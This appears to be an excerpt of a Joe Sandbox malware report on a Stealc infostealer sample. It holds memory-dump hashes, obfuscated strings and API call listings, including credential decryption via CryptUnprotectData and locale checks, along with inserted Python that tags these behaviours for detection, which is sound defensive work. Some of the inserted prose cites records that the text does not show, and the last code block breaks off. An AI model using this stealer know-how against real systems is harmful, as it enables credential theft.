                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID:
                                    • API String ID: 2567437900-0
                                    • Opcode ID: f4ec3ad529c00da1fca4300a90e8c4df9910d7bedb7e0674cad8b06f4680f7cc
                                    • Instruction ID: e7f7f50dd175f5b26947e9e546b9e5c700d1982a783229fc381663d840b37bb8
                                    • Opcode Fuzzy Hash: f4ec3ad529c00da1fca4300a90e8c4df9910d7bedb7e0674cad8b06f4680f7cc
                                    • Instruction Fuzzy Hash: 453185315129199BCB72EF68ED85E9E77B9BF90310F044139F82997211CB78EC01BBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (\$7I6}$9-J$Dlz{$NDy$XKy2$wJW<$bm_
                                    • API String ID: 0-848267255
                                    • Opcode ID: d6a0eb8652e893dceba8019b035ce585b56220b9dc477d29560278ba26777fe5
                                    • Instruction ID: 505258d7a957167a62ca65599bce25dbb975d02f04cd2fc5089f0bd658df66b7
                                    • Opcode Fuzzy Hash: d6a0eb8652e893dceba8019b035ce585b56220b9dc477d29560278ba26777fe5
                                    • Instruction Fuzzy Hash: 65B228F3A0C214AFE3046E2DEC4567ABBE9EF94320F16493DEAC5C3744EA3558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: v$!~^$"{o$@nw$G}o$MIg$P;1$]xG
                                    • API String ID: 0-2946192670
                                    • Opcode ID: 3c4de2647cef70fb497e2c6f6dbbf6588aaa22f80abcb63d93efeef8a2a82572
                                    • Instruction ID: b879aa925b9bf7fb5031b39f3a702a75bfc031897334e68d93f12f9a51867071
                                    • Opcode Fuzzy Hash: 3c4de2647cef70fb497e2c6f6dbbf6588aaa22f80abcb63d93efeef8a2a82572
                                    • Instruction Fuzzy Hash: BFB217F36086009FE304AE2DEC8567ABBE5EFD4720F1A4A3DEAC4C7744E67558058693
                                    APIs
                                      • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00F82D9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00F82DAD
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00F82DBA
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F82DEC
                                    • LocalFree.KERNEL32(00000000), ref: 00F82FCA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 0c0ece8df2aff37dfa012a58b5929affc6ad0b3abe9dd78973b6eae45a470145
                                    • Instruction ID: d8c690d0b2f79cd4b49d0b464ec232401a4ef1ea975764254be532d6b19a04e7
                                    • Opcode Fuzzy Hash: 0c0ece8df2aff37dfa012a58b5929affc6ad0b3abe9dd78973b6eae45a470145
                                    • Instruction Fuzzy Hash: D0B10971900204CFC765DF18C948B99B7F1FB44328F29C1ADD418AB2A6D776AD82DF94
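The three 'APIs' records above (the Toolhelp32 walk that compares each process name against steam.exe, the lstrcpy/lstrcat path build that feeds FindFirstFileA, and the GetKeyboardLayoutList/GetLocaleInfoA chain behind the report's "may stop execution after checking locale" signature) can be tagged mechanically from the report text. The Python below is an added example written for this page, not Joe Sandbox or Stealc code: it parses lines in the report's "Api.MODULE(args), ref: ADDR" form and tags those three behaviours. The sample inputs are copied from the records above. The constants are the documented Win32 values the arguments shown resolve to: the CreateToolhelp32Snapshot flag 0x2 is TH32CS_SNAPPROCESS, the GetLocaleInfoA LCType 0x2 is LOCALE_SLANGUAGE, and the 0x128-byte buffer passed to Process32First/Next is the size of an ANSI PROCESSENTRY32. The function names, tag strings and the set of string-compare APIs are this example's own assumptions.

```python
import re
from collections import namedtuple
from typing import List, Optional

# One report line "• Api.MODULE(arg,arg), ref: ADDR", optionally prefixed by the
# "Part of subcall function X:" marker the report uses for calls made inside a callee.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)
ApiCall = namedtuple("ApiCall", "api module args ref caller")

TH32CS_SNAPPROCESS = 0x00000002  # CreateToolhelp32Snapshot flag: include the process list
LOCALE_SLANGUAGE = 0x00000002    # GetLocaleInfo LCType: localized language name
NAME_COMPARE_APIS = {"StrCmpCA", "StrCmpCW", "StrCmpIA", "StrCmpIW", "lstrcmpA", "lstrcmpiA"}  # assumed set
PATH_BUILD_APIS = {"lstrcpy", "lstrcpyA", "lstrcpyW", "lstrcat", "lstrcatA", "lstrcatW"}

def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the 'APIs' section of one report record into ApiCall tuples, in call order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["caller"]))
    return calls

def _hex(arg: str) -> Optional[int]:  # the sandbox prints '?' for arguments it could not resolve
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def find_process_hunt(calls: List[ApiCall]) -> List[str]:
    """Toolhelp32 process walk plus a name compare: returns the literal process names looked for."""
    apis = {c.api for c in calls}
    snap = next((c for c in calls if c.api == "CreateToolhelp32Snapshot"), None)
    if snap is None or not {"Process32First", "Process32Next"} <= apis:
        return []
    flags = _hex(snap.args[0]) if snap.args else None
    if flags is None or not flags & TH32CS_SNAPPROCESS:
        return []
    return [a for c in calls if c.api in NAME_COMPARE_APIS
            for a in c.args if a.lower().endswith(".exe")]

def find_locale_probe(calls: List[ApiCall]) -> Optional[dict]:
    """GetKeyboardLayoutList then GetLocaleInfo*: the check behind the report's
    'may stop execution after checking locale' signature. Returns the LCType queried."""
    if not any(c.api == "GetKeyboardLayoutList" for c in calls):
        return None
    for c in calls:
        if c.api in ("GetLocaleInfoA", "GetLocaleInfoW") and len(c.args) >= 2:
            lctype = _hex(c.args[1])
            name = "LOCALE_SLANGUAGE" if lctype == LOCALE_SLANGUAGE else "other"
            return {"lctype": lctype, "lctype_name": name, "ref": c.ref}
    return None

def find_runtime_path_enum(calls: List[ApiCall]) -> Optional[str]:
    """Path assembled with lstrcpy/lstrcat, then FindFirstFile*: returns the ref of that call."""
    built = False
    for c in calls:
        if c.api in PATH_BUILD_APIS:
            built = True
        elif c.api in ("FindFirstFileA", "FindFirstFileW") and built:
            return c.ref
    return None

def classify(text: str) -> List[str]:
    """Behaviour tags for one record's 'APIs' text (the tag names are this example's own)."""
    calls = parse_api_lines(text)
    tags = [f"process-hunt:{name}" for name in find_process_hunt(calls)]
    probe = find_locale_probe(calls)
    if probe:
        tags.append(f"locale-probe:{probe['lctype_name']}")
    ref = find_runtime_path_enum(calls)
    if ref:
        tags.append(f"file-enum@{ref}")
    return tags

# Sample inputs: three 'APIs' records from this report, copied as they appear above.
SAMPLE_PROCESS_HUNT = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00F84628
• Process32First.KERNEL32(00000000,00000128), ref: 00F84638
• Process32Next.KERNEL32(00000000,00000128), ref: 00F8464A
• StrCmpCA.SHLWAPI(?,steam.exe), ref: 00F84660
• Process32Next.KERNEL32(00000000,00000128), ref: 00F84672
• CloseHandle.KERNEL32(00000000), ref: 00F8467D
"""
SAMPLE_FILE_ENUM = """\
• lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F74B51
• lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F74BB3
• FindFirstFileA.KERNEL32(00000000,?), ref: 00F74BFA
"""
SAMPLE_LOCALE = """\
  • Part of subcall function 00F871E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00F871FE
• GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00F82D9B
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F82DEC
• LocalFree.KERNEL32(00000000), ref: 00F82FCA
"""

if __name__ == "__main__":
    for label, sample in (("00F84628", SAMPLE_PROCESS_HUNT), ("00F74B51", SAMPLE_FILE_ENUM), ("00F82D9B", SAMPLE_LOCALE)):
        print(label, classify(sample))
```

Run directly it prints the tags for the three records; on a full report, hand each record's 'APIs' block to classify(). One design choice to be aware of: the process-hunt tag requires a literal target name, so a record whose compare argument the sandbox shows as "?" (a name held in a pointer rather than a string constant) produces no tag from the name compare alone, and you should relax find_process_hunt to flag the bare Toolhelp32 chain if that is what you want to catch.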
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #_W$'Rg|$6;~~$6H^$>'_?$Sk$UJ
                                    • API String ID: 0-1282386379
                                    • Opcode ID: 8c526caacf2bf555990d9dc8a689350e67ba99df1f6b1ed76dce5bc3f670b337
                                    • Instruction ID: 14cefed3110ed5ad75d34b1d407d850d6f604a1072cbd710be1d6f5d7f6f69e9
                                    • Opcode Fuzzy Hash: 8c526caacf2bf555990d9dc8a689350e67ba99df1f6b1ed76dce5bc3f670b337
                                    • Instruction Fuzzy Hash: 07B204F3A0C2049FE3046E2DEC8567ABBE9EFD4320F1A493DE6C487740EA3558058796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7X"r$;gY}$YD=s$Y|A$v_Wo$y<u$}<u
                                    • API String ID: 0-630130594
                                    • Opcode ID: db11d967f42689d1e736bb1312946a5c14faee244802422b0a0e7e1ca93ae75a
                                    • Instruction ID: d3f8ea8760b3ce86eb05dfe968fc234149b498811d47b532a92ac00dda958b3d
                                    • Opcode Fuzzy Hash: db11d967f42689d1e736bb1312946a5c14faee244802422b0a0e7e1ca93ae75a
                                    • Instruction Fuzzy Hash: 2D820BF360C2049FE304AE2DEC8567ABBE5EF94720F1A853DEAC5C3744EA3558058693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @;q$0> $Pf$`z~$2+v$B?v
                                    • API String ID: 0-4177026925
                                    • Opcode ID: 66123f2ae13fef18d5e6471e4f515855dec4f2a60ed89549113e077f1bd4a081
                                    • Instruction ID: 741418a7ec3e65695b73352c21150f02f41a44cfbe34ded058124721b00d2734
                                    • Opcode Fuzzy Hash: 66123f2ae13fef18d5e6471e4f515855dec4f2a60ed89549113e077f1bd4a081
                                    • Instruction Fuzzy Hash: 61B229F3A082049FE304AE2DEC4567ABBE5EFD4720F1A853DEAC4C7744E93598058697
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: @ZC_$LT}_$QEd$Z3Z$uFw$om
                                    • API String ID: 0-4011615732
                                    • Opcode ID: 6cc8a2596e04e44fe6bf18bede254c7c70ee407e25a5ec4573ca6f401439f887
                                    • Instruction ID: 4af3f9d6ed3ab8f11840355cbb15af8f9949734029b562da6a72612271f4a475
                                    • Opcode Fuzzy Hash: 6cc8a2596e04e44fe6bf18bede254c7c70ee407e25a5ec4573ca6f401439f887
                                    • Instruction Fuzzy Hash: 95B208F3A0C6009FE3046E29EC8567AFBE9EF94720F16493DEAC5C3744EA3558118697
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: ,$Wo$9<$C"vs$f$w?$fQ^$u~
                                    • API String ID: 0-88732017
                                    • Opcode ID: e3e6fec621ad8cdd92d47766b409b291ad4e5082e28bfa1e6cbc59b4de7715eb
                                    • Instruction ID: fd13b06a82f624ae0776d187db5b392139395ea0177917089c713ce01f57aa58
                                    • Opcode Fuzzy Hash: e3e6fec621ad8cdd92d47766b409b291ad4e5082e28bfa1e6cbc59b4de7715eb
                                    • Instruction Fuzzy Hash: D2B228F39082049FE7046E2DEC4577ABBE9EF94720F1A493DEAC5C3744EA3559008697
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: #Kk$,jW7$1&?~$33Od${m3$bw
                                    • API String ID: 0-2654596649
                                    • Opcode ID: 629fa57fcffca4e1a1db70583a2a272b055a9ec96e2d6780a176c1a2fec0fbe4
                                    • Instruction ID: c03cd67bc29041cea9b8ac1b66e298bac007b5c24c591132365c95c7c775b85f
                                    • Opcode Fuzzy Hash: 629fa57fcffca4e1a1db70583a2a272b055a9ec96e2d6780a176c1a2fec0fbe4
                                    • Instruction Fuzzy Hash: DAB205F360C200AFE308AE2DEC8567AFBE5EF94720F1A493DE6C583744E67558148697
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82C42
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82C49
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 00F82C58
                                    • wsprintfA.USER32 ref: 00F82C83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: d05c60274c5dec322bccf53bf11579c6cb00202229b6740af04caee371916cf3
                                    • Instruction ID: 63997d545dfd52025d3610f95af7b9bebf4be639f94178e6c2a543e06245ca08
                                    • Opcode Fuzzy Hash: d05c60274c5dec322bccf53bf11579c6cb00202229b6740af04caee371916cf3
                                    • Instruction Fuzzy Hash: 3601F7B1A00608ABDB2C9B58DC4ABA9B76DEB85721F04432DF935DB2C0D774590087D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: .h6$Q4C}$YJd@$3[V$Yk
                                    • API String ID: 0-1004772429
                                    • Opcode ID: 709578786d961a32dd514578bbb724cffcfb92265552ffdc929fa75c211003c4
                                    • Instruction ID: 74c8f47015d0fb021ac41e5c6094dfbe1c5f212c97e4dcd074a44da52cf27483
                                    • Opcode Fuzzy Hash: 709578786d961a32dd514578bbb724cffcfb92265552ffdc929fa75c211003c4
                                    • Instruction Fuzzy Hash: 00B23AF3A082049FE304AE2DEC8567AF7E9EFD4720F1A893DE6C4C7744E53598058696
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID:
                                    • String ID: ?$J*G$iy{w$ygj_$I}
                                    • API String ID: 0-1111068510
                                    • Opcode ID: 7bd8156a4d7da056673f3b86cb25abeb260406d80d7710d4f657c007b96aa322
                                    • Instruction ID: 8ac0e9b12e348dcbba46dc010e23a6e9b02254c869d51e38b4db4e37cba933cc
                                    • Opcode Fuzzy Hash: 7bd8156a4d7da056673f3b86cb25abeb260406d80d7710d4f657c007b96aa322
                                    • Instruction Fuzzy Hash: C4B208F360C2009FE304AE2DEC8567AFBE6EF94720F1A493DE6C5C7744E63598058696
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6775E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F67765
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F6778D
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00F677AD
                                    • LocalFree.KERNEL32(?), ref: 00F677B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 35f1aa9eb9507d269e93047e7c9596d001c099a0153cf27a46e30f842594bc2a
                                    • Instruction ID: cb5ee47fdae7f8598471640428392f7f891e01959103e1781c47e09a991ee323
                                    • Opcode Fuzzy Hash: 35f1aa9eb9507d269e93047e7c9596d001c099a0153cf27a46e30f842594bc2a
                                    • Instruction Fuzzy Hash: 9A017575B403087FEB14DA94DC0AFAA777CEB44B14F004158FB28EB2C0D6B09940C790
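The three APIs listings in this part of the report (the GetTimeZoneInformation/wsprintfA sequence above, the CryptUnprotectData sequence directly above, and the CreateToolhelp32Snapshot/Process32First/Process32Next walk that follows) are the page's most useful triage signal, because they show what the unpacked Stealc code does rather than how it is packed. As an added example, not part of the Joe Sandbox report, here is a small Python parser that turns such listings into structured call records and maps each function's call set to a capability label. The sample input is the page's own three listings copied verbatim; the label names, the signature table and the reading of the argument values (dwFlags 0x1 = CRYPTPROTECT_UI_FORBIDDEN, dwFlags 0x2 = TH32CS_SNAPPROCESS) are the editor's assumptions, not sandbox output.

```python
"""Label Joe Sandbox 'APIs' listings by the Win32 call sequence they show.

Added example: the parser and the capability table below are the editor's
own, not Joe Sandbox output.  SAMPLE_REPORT is constructed from the three
APIs listings on this page, copied verbatim.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample input: each "APIs" header starts one function's calls.
SAMPLE_REPORT = """\
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82C42
• RtlAllocateHeap.NTDLL(00000000), ref: 00F82C49
• GetTimeZoneInformation.KERNEL32(?), ref: 00F82C58
• wsprintfA.USER32 ref: 00F82C83
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F6775E
• RtlAllocateHeap.NTDLL(00000000), ref: 00F67765
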